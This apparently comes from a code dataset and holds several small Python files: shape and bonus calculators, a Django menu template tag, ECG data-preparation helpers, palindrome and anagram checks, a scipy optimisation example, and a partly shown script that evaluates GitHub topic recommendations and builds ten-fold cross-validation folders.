+{"seq_id":"590914551","text":"from Quadrilateral import *\n\nprint(\"what shape are we calculating area or perimeter for?\")\nshape = input()\nprint(\"Are we calculating area or perimeter?\")\ncalc = input().lower()\n\n\ndef what_shape(shape):\n if shape =='rectangle':\n return is_rect(calc)\n elif shape =='square':\n return is_square(calc)\n elif shape == 'rhombus':\n return is_rhombus(calc)\n elif shape == 'trapezoid':\n return is_trap(calc)\n else:\n raise AssertionError('Please enter a shape in the listed directory')\n\n\nresponse = what_shape(shape)\nprint(\"Your {0} is\".format(calc), response)","sub_path":"AreaCalculator/Area.py","file_name":"Area.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"84376348","text":"#!/usr/bin/Anaconda3/python\n# -*- coding: utf-8 -*- \n# @Time : 2019/8/20 1:34 \n\n\"\"\"\nA company pays bonuses as a commission on profit. For a profit I (in units of 10,000 yuan):\n+ at or below 10, the bonus is 10% of the profit;\n+ above 10 and below 20, the part up to 10 earns 10% and the part above 10 earns 7.5%;\n+ between 20 and 40, the part above 20 earns 5%;\n+ between 40 and 60, the part above 40 earns 3%;\n+ between 60 and 100, the part above 60 earns 1.5%,\n+ above 100, the part beyond 100 earns 1%\n\"\"\"\nIin = int(input(\"Enter the monthly profit (in units of 10,000 yuan): \"))\nxIin = [0,10,20,40,60,100] # profit tier thresholds\nxIin.reverse()\nyIin = [10,7.5,5,3,1.5,1] # commission rate (%) for each tier\nyIin.reverse()\nres = 0.0\nfor i in range(len(xIin)):\n if Iin > xIin[i]:\n res1 = (Iin-xIin[i])*yIin[i]/100\n print(\"Tier %s, profit slice: [%0.3s,%3s], rate: %4s, bonus: %s (10k yuan)\"%(i,xIin[i],xIin[i-1],yIin[i],res1))\n res += res1\n Iin = xIin[i]\n\nprint(\"Total bonus: %s (10k yuan)\"%res)\n\n\n","sub_path":"03_Python100题/002.py","file_name":"002.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"295988143","text":"__author__ = 'Hiren'\nfrom django import template\nfrom menus.models import Menu\nfrom userSettings.models import UserSetting\n\nregister = template.Library() #DO NOT REMOVE. Required for module to load correctly\n\n# Name: getSubMenuList\n# Description: Given a menu record, generate HTML string of its sub menus\n# Parameters:\n# menu (I,REQ) - Menu record\n# security_level (I,REQ) - User's security level. Limits which menus are available\n# Returns: HTML string of menu tree under the one passed in.\ndef getSubMenuList(menu, security_level):\n sSubMenuList = \"\"\n\n # Check if loading an action button, in which case the sub menu search stops here\n if menu.menu_type == 'ACTION':\n sSubMenuList = \"
  • \" + menu.display_name + \"
  • \"\n else:\n # We're checking a main or sub menu. Find child menu items\n subMenuList = Menu.objects.filter(\n parent_menu_items=menu.id\n ).exclude(\n # Main menu records can't be sub menus\n menu_type='MAIN'\n ).exclude(\n # Only load the menu if the user has the appropriate security\n securityLevel__gt=security_level\n )\n\n for subMenu in subMenuList:\n sSubMenuList += getSubMenuList(subMenu, security_level)\n\n # Only add current menu if there's at least one action menu down the tree\n if sSubMenuList != \"\":\n # Label on a main menu item is printed differently than sub menu labels\n if menu.menu_type == 'MAIN':\n sSubMenuList = \"
  • \" + menu.display_name + \"
      \" + sSubMenuList + \"
  • \"\n else:\n sSubMenuList = \"
  • \" + menu.display_name + \"...
      \" + sSubMenuList + \"
  • \"\n\n return sSubMenuList\n\n@register.inclusion_tag('menu_template.html')\ndef show_menu(current_user):\n\n loggedIn = current_user.is_authenticated()\n\n sMenuList = \"\"\n if loggedIn:\n\n # Load user settings to get logged in user's security level\n user_settings = UserSetting.objects.get(user=current_user.id)\n\n #Load menu items\n mainMenuList = Menu.objects.filter(menu_type='MAIN')\n for mainMenu in mainMenuList:\n # For each main menu, load available sub menus\n sMenuList += getSubMenuList(mainMenu, user_settings.securityLevel)\n\n return {\n 'menu_list': sMenuList,\n 'logged_in': loggedIn,\n }\n\n","sub_path":"HirenAuto/menus/templatetags/menu_templatetags.py","file_name":"menu_templatetags.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"544117813","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2019/5/25 16:37\n@Author : QuYue\n@File : data_process.py\n@Software: PyCharm\nIntroduction: Process the data.\n\"\"\"\n#%% Import Packages\nimport torch\nimport numpy as np\nimport torch\nimport sklearn.model_selection\n#%% Function\ndef label_from_0(Y):\n # Change the label from 0\n Y = np.array(Y)\n Y -= Y.min()\n return Y\n\ndef cut_out(X, len):\n # Cut out the ECG signal\n X_new = []\n for i in X:\n X_new.append(i[:, : len])\n output = np.array(X_new)\n return X_new\n\ndef axis_change(X):\n # Change the ECG data's axis to channel * length* width\n for i in range(len(X)):\n X[i] = X[i][..., np.newaxis]\n return X\n\ndef to_tensor(X, Y):\n # Change the data to torch.Tensor\n X = torch.FloatTensor(X)\n Y = torch.FloatTensor(Y).type(torch.LongTensor)\n return X, Y\n\n\ndef train_test_split(X, Y, trainratio=0.9, random_state=0):\n # Split the train data and test data\n train_x, test_x, train_y, test_y = sklearn.model_selection.train_test_split(X, Y,\n test_size=1 - trainratio,\n random_state=random_state,\n stratify=Y)\n return train_x, test_x, train_y, test_y\n\n","sub_path":"Workspace/Code/Experiment2_Multi_channel_CNN/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"378560110","text":"#BUENA PRÁCTICA --> Función principal que corra el programa, se le suele llamar run o main\n#Entry point --> Punto de entrada del programa\n\ndef palindromo(palabra):\n palabra = palabra.replace(' ', '').lower() #eliminar los espacios y bajar a mayúsculas\n\n if palabra == palabra[::-1]:\n return True\n else:\n return False\n\ndef run(): \n palabra = input('Escribe una palabra: ')\n\n if palindromo(palabra) == True:\n print('Es palindromo')\n else:\n print('No es palíndromo')\n\n\nif __name__ == '__main__':\n run()","sub_path":"palindromo.py","file_name":"palindromo.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"437336970","text":"\"\"\"\nCheck whether two strings are anagram of each other\nWrite a function to check whether two given strings are anagram of each other or not. An anagram of a string is another string that contains same characters, only the order of characters can be different. 
For example, “abcd” and “dabc” are anagram of each other.\n\nAnagram Words\n\nListen - Silent\n\nTriangle - Integral\n\nMethod 1 (Use Sorting)\n\nSort both strings\nCompare the sorted strings\n\nTime Complexity: O(nLogn)\n\nMethod 2 (Count characters)\nThis method assumes that the set of possible characters in both strings is small. In the following implementation, it is assumed that the characters are stored using 8 bit and there can be 256 possible characters.\n\nCreate count arrays of size 256 for both strings. Initialize all values in count arrays as 0.\nIterate through every character of both strings and increment the count of character in the corresponding count arrays.\nCompare count arrays. If both count arrays are same, then return true.\n\n\"\"\"\n\n# Python program to check if two strings are anagrams of\n# each other\nNO_OF_CHARS = 256\n\n# Function to check whether two strings are anagram of\n# each other\ndef are_anagram(str1, str2):\n count1=[0]*NO_OF_CHARS\n count2 = [0] * NO_OF_CHARS\n for item in str1:\n count1[ord(item)]+=1\n for item in str2:\n count2[ord(item)] += 1\n if (len(str1)!=len(str2)):\n return False\n for i in range(NO_OF_CHARS):\n if(count1[i]!=count2[i]):\n return False\n return True\n# print(are_anagram(\"geeksforgeeks\", \"forgeeksgeeks\"))\n\ndef anagram(a, b):\n if not len(a)==len(b):\n return False\n\n str1 = sorted(a.lower())\n str2 = sorted(b.lower())\n if str1 == str2:\n return True\n else:\n return False\n\nprint(anagram(\"abcde\", \"aBced\"))","sub_path":"Algorithms/String/3_anagram.py","file_name":"3_anagram.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"603851493","text":"from scipy.optimize import minimize\r\n\r\n# loss function\r\nfun = lambda x: x[0]**2 + x[1]**2 - 6*x[0]*x[1] - 4*x[0] - 5*x[1]\r\n\r\n# constraints\r\nc1 = lambda x: -(x[0] - 2)**2 + 4 - x[1]\r\nc1_updated = lambda x: -(x[0] - 2)**2 + 4.1 - x[1]\r\nc2 = lambda x: x[1] + x[0] - 1\r\n\r\ncons = ({'type': 'ineq', 'fun': c1},\r\n{'type': 'ineq', 'fun': c2})\r\n\r\nres = minimize(fun, (2, 0), method='SLSQP', constraints=cons)\r\n\r\nprint(res)\r\n\r\ncons = ({'type': 'ineq', 'fun': c1_updated},\r\n{'type': 'ineq', 'fun': c2})\r\n\r\nres = minimize(fun, (2, 0), method='SLSQP', constraints=cons)\r\n\r\nprint(res)","sub_path":"PS0/ESE546_HW0_Solutions/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"38579648","text":"from nltk.stem import PorterStemmer\r\nimport os, shutil\r\nfrom shutil import copyfile\r\nimport collections, operator\r\nfrom distutils.dir_util import copy_tree\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\ndef get_topics(dict_actual,key_actual,dict_predicted,key_predicted):\r\n list_actual=dict_actual.get(key_actual)\r\n list_predicted=dict_predicted.get(key_predicted)\r\n return list_actual,list_predicted[0:5], list_predicted[0:2], list_predicted[0:8]\r\n\r\n\r\ndef stemming_topics(predicted,actual):\r\n stemmer = PorterStemmer()\r\n stemmed_pred=[]\r\n stemmed_act=[]\r\n for p in predicted:\r\n stemmed_pred.append(stemmer.stem(p))\r\n for a in actual:\r\n stemmed_act.append(stemmer.stem(a))\r\n return stemmed_pred , stemmed_act\r\n\r\n\r\ndef success_rate(predicted, actual, n):\r\n if actual:\r\n match = [value for value in predicted if value in actual]\r\n if len(match)>=n:\r\n return 1\r\n else:\r\n return 0\r\n else:\r\n 
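# no gold topics are recorded for this repository, so -1 marks the case as not evaluable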
return -1\r\n\r\n\r\ndef precision(predicted,actual):\r\n if actual:\r\n true_p = len([value for value in predicted if value in actual])\r\n false_p= len([value for value in predicted if value not in actual])\r\n return (true_p / (true_p + false_p))*100\r\n else:\r\n return -1\r\n\r\n\r\ndef recall(predicted,actual):\r\n if actual:\r\n true_p = len([value for value in predicted if value in actual])\r\n false_n=len([value for value in actual if value not in predicted])\r\n return (true_p/(true_p + false_n))*100\r\n else:\r\n return -1\r\n\r\n\r\ndef top_rank(predicted,actual):\r\n top = predicted.pop(0)\r\n if top in actual:\r\n predicted.insert(0, top)\r\n return 1\r\n else:\r\n return 0\r\n\r\n\r\n\r\n\r\n\r\ndef remove_dashes(actual):\r\n result=[]\r\n for topic in actual:\r\n if topic.find(\"-\")!=-1:\r\n result.append(topic.replace(\"-\",\"\"))\r\n else:\r\n result.append(topic)\r\n return result\r\n\r\n\r\n\r\n\r\ndef find_repo_names(file_in, file_to_check, file_out):\r\n begin=open(file_in,\"r\", encoding=\"utf-8\", errors=\"ignore\").readlines()\r\n to_check=open(file_to_check,\"r\", encoding=\"utf-8\", errors=\"ignore\").readlines()\r\n out=open(file_out,\"w\", encoding=\"utf-8\", errors=\"ignore\")\r\n\r\n list_begin=[]\r\n list_check=[]\r\n for line1,line2 in zip(begin,to_check):\r\n if line1.strip().find(\"/\")!=-1 and line2.strip().find(\"/\") != -1:\r\n if line1.strip() != line2.strip():\r\n out.write(line1.strip()+\"\\n\")\r\n\r\ndef add_lang(guess_list, repo_name, list_predicted):\r\n for elem in guess_list:\r\n if elem[0] == repo_name:\r\n if elem[2] > str(10):\r\n list_predicted.pop()\r\n list_predicted.append(elem[1])\r\n\r\n return list_predicted\r\n\r\n\r\n\r\ndef preprocess_names(test_folder, test_file):\r\n\r\n out=open(test_file,\"w\", encoding=\"utf-8\", errors=\"ignore\")\r\n for topic in os.listdir(test_folder):\r\n out.write(topic + \"\\n\")\r\n for file in os.listdir(test_folder+\"\\\\\"+topic):\r\n file=file.replace(\".txt\",\"\")\r\n out.write(file.replace(\",\",\"/\")+\"\\n\")\r\n # else:\r\n # pos=file.find(\"-\",0,10)\r\n # list_f=list(file)\r\n # list_f[pos]=\"/\"\r\n # out.write(\"\".join(list_f)+\"\\n\")\r\n\r\n\r\ndef remove_not_featured(file_topic, actual):\r\n topics=open(file_topic,\"r\", encoding=\"utf-8\", errors=\"ignore\")\r\n discarded_topic=open(\"discarded_topic.txt\",\"a+\", encoding=\"utf-8\", errors=\"ignore\")\r\n list_featured=[]\r\n for t in topics:\r\n list_featured.append(t.strip())\r\n featured=[value for value in actual if value in list_featured]\r\n not_featured=[value for value in actual if value not in list_featured]\r\n for nf in not_featured:\r\n discarded_topic.write(nf+\"\\n\")\r\n\r\n return featured\r\n\r\n\r\ndef compute_metrics(act_topics,pred_topics, out_results,repo):\r\n out_results.write(repo + \",\")\r\n if act_topics:\r\n act_topics = remove_not_featured(\"already_downloaded.txt\", act_topics)\r\n\r\n ##add language\r\n guess_list = extractNames(\"results1.txt\")\r\n pred_topics = add_lang(guess_list, repo.strip(), pred_topics)\r\n # pred_topics=pred_topics[:len(act_topics)]\r\n out_results.write(\"actual topics [\" + ','.join([str(elem) for elem in act_topics]) + \"]\" + \"\\n\")\r\n out_results.write(\"predicted topics [\" + ','.join([str(elem) for elem in pred_topics]) + \"]\" + \"\\n\")\r\n pred_topics = remove_dashes(pred_topics)\r\n act_topics = remove_dashes(act_topics)\r\n pred_topics, act_topics = stemming_topics(pred_topics, act_topics)\r\n\r\n for x in range(1, 6):\r\n ##act_topics = 
composed_word_h(act_topics)\r\n out_results.write(str(success_rate(pred_topics, act_topics, x)) + \",\")\r\n out_results.write(str(precision(pred_topics, act_topics)) + \",\")\r\n # avg_precision += precision(pred_topics, act_topics)\r\n out_results.write(str(recall(pred_topics, act_topics)) + \",\")\r\n # avg_recall+=recall(pred_topics,act_topics)\r\n # out_results.write(str(pred_topics[0:1]))\r\n out_results.write(str(top_rank(pred_topics, act_topics)) + \"\\n\")\r\n # total_top += top_rank(pred_topics,act_topics)\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef calculate_metrics(test_dataset, out_results, out_results2, out_results3, actual, predicted,flag):\r\n # avg_precision=0.0\r\n # avg_recall=0.0\r\n # total_top=0\r\n # test_avg_precision=0.0\r\n # test_avg_recall = 0.0\r\n # test_avg_top_rank = 0\r\n\r\n\r\n for repo in test_dataset:\r\n if repo.strip().find(\"/\") != -1:\r\n ##get user topics\r\n act_topics, five_topics, two_topics, eight_topics = get_topics(actual, key_actual=str(repo).strip(), dict_predicted=predicted,\r\n key_predicted= str(repo).strip().replace(\"/\",\",\") + \".txt\")\r\n compute_metrics(act_topics, five_topics,out_results,repo)\r\n compute_metrics(act_topics, two_topics, out_results2, repo)\r\n compute_metrics(act_topics, eight_topics, out_results3, repo)\r\n\r\n # out_results.write(repo+\",\")\r\n # if act_topics:\r\n # act_topics = remove_not_featured(\"already_downloaded.txt\", act_topics)\r\n # if flag:\r\n # append_new_topics(\"discarded_topic.txt\", pred_topics)\r\n #\r\n #\r\n # ##add language\r\n # guess_list=extractNames(\"results.txt\")\r\n # pred_topics = add_lang(guess_list, repo.strip(), pred_topics)\r\n # #pred_topics=pred_topics[:len(act_topics)]\r\n # #out_results.write(\"actual topics [\" + ','.join([str(elem) for elem in act_topics]) + \"]\" + \"\\n\")\r\n # #out_results.write(\"predicted topics [\" + ','.join([str(elem) for elem in pred_topics]) + \"]\" + \"\\n\")\r\n # pred_topics=remove_dashes(pred_topics)\r\n # act_topics=remove_dashes(act_topics)\r\n # pred_topics, act_topics = stemming_topics(pred_topics, act_topics)\r\n #\r\n # for x in range(1,6):\r\n # ##act_topics = composed_word_h(act_topics)\r\n # out_results.write(str(success_rate(pred_topics, act_topics,x)) + \",\")\r\n # out_results.write(str(precision(pred_topics, act_topics)) + \",\")\r\n # #avg_precision += precision(pred_topics, act_topics)\r\n # out_results.write(str(recall(pred_topics, act_topics)) + \",\")\r\n # #avg_recall+=recall(pred_topics,act_topics)\r\n # #out_results.write(str(pred_topics[0:1]))\r\n # out_results.write(str(top_rank(pred_topics,act_topics)) + \"\\n\")\r\n # #total_top += top_rank(pred_topics,act_topics)\r\n\r\n else:\r\n #out_results.write(\"------------------------------\" + \"\\n\")\r\n #out_results.write(repo)\r\n continue\r\n # if len(actual)> 0:\r\n # # out_results.write(\"avg precision: \" + str(avg_precision/ len(actual))+\"\\n\")\r\n # # out_results.write(\"avg recall: \" + str(avg_recall / len(actual)) + \"\\n\")\r\n # # out_results.write(\"top rank ratio: \" + str(total_top * len(actual)) + \"\\n\")\r\n #\r\n # test_avg_precision += avg_precision\r\n # test_avg_recall += avg_recall\r\n # test_avg_top_rank += total_top\r\n\r\n\r\n\r\n\r\n\r\ndef ten_folder(path_train,path_dest,cut,copy):\r\n\r\n i=0\r\n\r\n for file in sorted(os.listdir(path_train), key=lambda v: v.upper()):\r\n print(file)\r\n i = i + 1\r\n if not copy:\r\n shutil.move(path_train+file, path_dest+file)\r\n else:\r\n copyfile(path_train+file, path_dest+file)\r\n if i == cut:\r\n i = 0\r\n 
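# the 'cut' quota for this folder has been reached: reset the counter and stop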
break\r\n continue\r\n\r\n\r\n# def count_no_fet_topics(file):\r\n# disc=open(file,\"r\",encoding=\"utf-8\",errors=\"ignore\")\r\n# #print(Counter(disc.readlines()))\r\n# c= collections.Counter(disc.readlines())\r\n# for key, value in sorted(c.items(), key=operator.itemgetter(1),reverse=True):\r\n# print(key.strip()+ \": \"+ str(value))\r\n\r\n\r\n# def sort_repos(file_in, file_out):\r\n# begin=open(file_in,\"r\", encoding=\"utf-8\", errors=\"ignore\")\r\n# out=open(file_out,\"w\", encoding=\"utf-8\", errors=\"ignore\")\r\n# for repo in sorted(begin.readlines(), key=lambda v: v.upper()):\r\n# out.write(repo.strip()+\"\\n\")\r\n\r\n\r\n# def move_test_set(file_in, file_out):\r\n# begin = open(file_in, \"r\", encoding=\"utf-8\", errors=\"ignore\")\r\n# out = open(file_out, \"w\", encoding=\"utf-8\", errors=\"ignore\")\r\n# temp= open(\"temp.txt\", \"w\", encoding=\"utf-8\", errors=\"ignore\")\r\n# n=10\r\n# # i=0\r\n# # temp_list=[]\r\n# # begin.seek(0)\r\n# # for repo in begin.readlines():\r\n# # #out.write(repo.strip()+\"\\n\")\r\n# #\r\n# # temp_list.append(repo.strip())\r\n# # i=i+1\r\n# # if i == 10:\r\n# # for s in temp_list:\r\n# # out.write(s+\"\\n\")\r\n# #\r\n# # for left in [value for value in temp_list if value not in begin.read().splitlines()]:\r\n# # temp.write(left+\"\\n\")\r\n# with open(file_in) as f:\r\n# mylist = f.read().splitlines()\r\n#\r\n# newlist = mylist[:n]\r\n# for elem in newlist:\r\n# out.write(elem+\"\\n\")\r\n#\r\n# #os.remove(file_in)\r\n#\r\n# thefile = open(file_in, 'w')\r\n#\r\n# del mylist[:n]\r\n#\r\n# for item in mylist:\r\n# thefile.write(\"%s\\n\" % item)\r\n\r\n\r\ndef append_new_topics(file_topics,predicted):\r\n disc = open(file_topics, \"r\", encoding=\"utf-8\", errors=\"ignore\")\r\n for t in disc:\r\n predicted.append(t.strip())\r\n return predicted\r\n### copy=True mv=False\r\n\r\n\r\n#actual=[\"phoenix\",\"java\",\"big-data\",\"database\",\"sql\"]\r\n#remove_not_fetured(\"already_downloaded.txt\",actual)\r\n\r\n\r\n# def tests_for_ten_folder():\r\n# sort_repos(\"discarded_topic.txt\",\"ordered_list.txt\")\r\n# for x in range(1,11):\r\n# print(x)\r\n# move_test_set(\"ordered_list.txt\",\"C:\\\\Users\\\\claudio\\\\Desktop\\\\test_repo\\\\monitoring\\\\test\"+str(x)+\".txt\")\r\n# #count_no_fet_topics(\"discarded_topic.txt\")\r\n\r\n\r\n\r\n\r\n\r\ndef ultimate_ten_folder():\r\n### ten folder validation\r\n path1=\"C:\\\\Users\\\\claudio\\\\Desktop\\\\projects_new_dataset\\\\\"\r\n path2=\"C:\\\\Users\\\\claudio\\\\Desktop\\\\half_50\"\r\n #\r\n for t in os.listdir(path1):\r\n ##group1\r\n ten_folder(path1 + t + \"\\\\\", path2 + \"\\\\root\\\\\"+t+\"\\\\\", 50, True)\r\n ten_folder(path2+\"\\\\root\\\\\"+t+\"\\\\\",path2+\"\\\\test1\\\\\"+t+\"\\\\\",5, False)\r\n ten_folder(path2 + \"\\\\root\\\\\" + t + \"\\\\\", path2 + \"\\\\train1\\\\\" + t + \"\\\\\", 45, True)\r\n ten_folder(path2+\"\\\\train1\\\\\"+t+\"\\\\\",path2+\"\\\\temp\\\\\"+t+\"\\\\\",45, True)\r\n # ##group2\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test2\\\\\" + t + \"\\\\\", 5, False)\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train2\\\\\" + t + \"\\\\\",40 , True)\r\n ten_folder(path2 + \"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train2\\\\\" + t + \"\\\\\", 5, True)\r\n # #group3\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test3\\\\\" + t + \"\\\\\", 5, False)\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train3\\\\\" + t + \"\\\\\", 35, True)\r\n ten_folder(path2 + 
\"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train3\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test2\\\\\" + t + \"\\\\\", path2 + \"\\\\train3\\\\\" + t + \"\\\\\", 5, True)\r\n # ##group4\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test4\\\\\" + t + \"\\\\\", 5, False)\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train4\\\\\" + t + \"\\\\\", 30, True)\r\n ten_folder(path2 + \"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train4\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test2\\\\\" + t + \"\\\\\", path2 + \"\\\\train4\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test3\\\\\" + t + \"\\\\\", path2 + \"\\\\train4\\\\\" + t + \"\\\\\", 5, True)\r\n\r\n # ##group5\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test5\\\\\" + t + \"\\\\\", 5, False)\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train5\\\\\" + t + \"\\\\\", 25, True)\r\n ten_folder(path2 + \"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train5\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test2\\\\\" + t + \"\\\\\", path2 + \"\\\\train5\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test3\\\\\" + t + \"\\\\\", path2 + \"\\\\train5\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test4\\\\\" + t + \"\\\\\", path2 + \"\\\\train5\\\\\" + t + \"\\\\\", 5, True)\r\n #\r\n # ##group6\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test6\\\\\" + t + \"\\\\\", 5, False)\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train6\\\\\" + t + \"\\\\\", 20, True)\r\n ten_folder(path2 + \"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train6\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test2\\\\\" + t + \"\\\\\", path2 + \"\\\\train6\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test3\\\\\" + t + \"\\\\\", path2 + \"\\\\train6\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test4\\\\\" + t + \"\\\\\", path2 + \"\\\\train6\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test5\\\\\" + t + \"\\\\\", path2 + \"\\\\train6\\\\\" + t + \"\\\\\", 5, True)\r\n # ##group7\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test7\\\\\" + t + \"\\\\\", 5, False)\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train7\\\\\" + t + \"\\\\\", 15, True)\r\n ten_folder(path2 + \"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train7\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test2\\\\\" + t + \"\\\\\", path2 + \"\\\\train7\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test3\\\\\" + t + \"\\\\\", path2 + \"\\\\train7\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test4\\\\\" + t + \"\\\\\", path2 + \"\\\\train7\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test5\\\\\" + t + \"\\\\\", path2 + \"\\\\train7\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test6\\\\\" + t + \"\\\\\", path2 + \"\\\\train7\\\\\" + t + \"\\\\\", 5, True)\r\n\r\n # ##group8\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test8\\\\\" + t + \"\\\\\", 5, False)\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train8\\\\\" + t + \"\\\\\", 10, True)\r\n ten_folder(path2 + \"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train8\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test2\\\\\" + t + \"\\\\\", path2 + \"\\\\train8\\\\\" + t + \"\\\\\", 5, True)\r\n 
ten_folder(path2 + \"\\\\test3\\\\\" + t + \"\\\\\", path2 + \"\\\\train8\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test4\\\\\" + t + \"\\\\\", path2 + \"\\\\train8\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test5\\\\\" + t + \"\\\\\", path2 + \"\\\\train8\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test6\\\\\" + t + \"\\\\\", path2 + \"\\\\train8\\\\\" + t + \"\\\\\",5, True)\r\n ten_folder(path2 + \"\\\\test7\\\\\" + t + \"\\\\\", path2 + \"\\\\train8\\\\\" + t + \"\\\\\", 5, True)\r\n\r\n # ##group9\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test9\\\\\" + t + \"\\\\\", 5, False)\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test2\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test3\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test4\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test5\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test6\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test7\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test8\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 5, True)\r\n\r\n # ##group10\r\n ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\test10\\\\\" + t + \"\\\\\", 5, False)\r\n #ten_folder(path2 + \"\\\\temp\\\\\" + t + \"\\\\\", path2 + \"\\\\train9\\\\\" + t + \"\\\\\", 0, True)\r\n ten_folder(path2 + \"\\\\test1\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test2\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test3\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test4\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test5\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test6\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + \"\\\\test7\\\\\" + t + \"\\\\\", path2 + \"\\\\train10\\\\\" + t + \"\\\\\", 5, True)\r\n ten_folder(path2 + 